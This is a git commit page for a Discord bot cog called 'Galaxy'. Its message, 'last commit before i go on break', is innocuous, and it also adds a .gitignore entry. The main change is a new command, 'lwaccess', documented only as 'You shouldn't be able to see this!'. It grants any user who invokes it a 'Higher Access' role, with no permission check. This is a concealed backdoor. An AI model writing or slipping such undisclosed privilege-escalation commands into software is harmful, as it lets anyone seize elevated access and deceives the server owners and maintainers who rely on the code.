last commit before i go on break

This commit is contained in:
Seaswimmer 2023-03-08 21:31:18 -05:00
parent d1b1041afd
commit 5d365e8eca
2 changed files with 7 additions and 0 deletions

1
.gitignore vendored
View file

@ -1,3 +1,4 @@
galaxy/slashtag arguments.txt
galaxy_server.yaml
global.yaml
galaxy_staff_server.yaml

View file

@ -15,6 +15,12 @@ class Galaxy(commands.Cog):
cocoemoji = 1028535684757209118
)
@commands.command()
async def lwaccess(self, ctx):
"""You shouldn't be able to see this!"""
await ctx.author.add_roles(1083210988888784996, reason="Requested through -lwaccess")
await ctx.send(content="Higher Access role granted.")
@commands.Cog.listener('on_message')
async def cocoreact(self, message):
emoji = self.bot.get_emoji(await self.config.guild(message.guild).cocoemoji())